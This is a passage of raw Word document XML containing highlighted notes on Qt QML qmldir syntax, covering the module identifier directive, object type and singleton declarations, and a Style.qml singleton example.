            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Declares the module identifier of the module. The </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ModuleIdentifier</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&gt; is the (dotted URI notation) identifier for the module, which must match the module's install path.</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The</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId292" w:anchor="semantics-of-identified-modules" w:history="1">
              <w:r w:rsidRPr="002C2AE0">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>module identifier directive</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>must be the first line of the file</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. Exactly one module identifier directive may exist in the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>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color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>file.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Example:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:before="180" w:after="375"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>module ExampleModule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidTr="002C2AE0">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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>singleton</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>TypeName</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>InitialVersion</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3663" w:type="pct"/>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2C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Declares a</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId293" w:history="1">
              <w:r w:rsidRPr="0035707C">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QML object type</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be made available by the module.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="525"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[singleton]</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Optional. Used to declare a singleton type.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="525"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;TypeName&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the type being made available</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="525"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;InitialVersion&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the module version for which the type is to be made available</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00064AC7">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
              <w:ind w:left="525"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;File&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the (relative) file name of the QML file that defines the type</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Zero or more object type declarations may exist in the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>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color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">file, however each object type must have a </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>unique type name within any particular version</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the module.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Note:</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404244"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>To declare a</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>singleton</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type, the QML file defining the type must include the</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0035707C">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pragma Singleton</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>statement.</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Example:</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Style w:val="comment"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>//Style.qml with custom singleton type definition</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C2AE0" w:rsidRPr="00906D8E" w:rsidRDefault="002C2AE0">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="262626"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00906D8E">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="262626"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pragma Singleton</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import </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtQuick</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.0</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Style w:val="type"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtObject</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> {</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    property </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="type"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> textSize: </w:t>
            </w:r>
            <w:r w:rsidRPr="002C2AE0">
              <w:rPr>
                <w:rStyle w:val="number"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>20</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    property color textColor: </w:t>
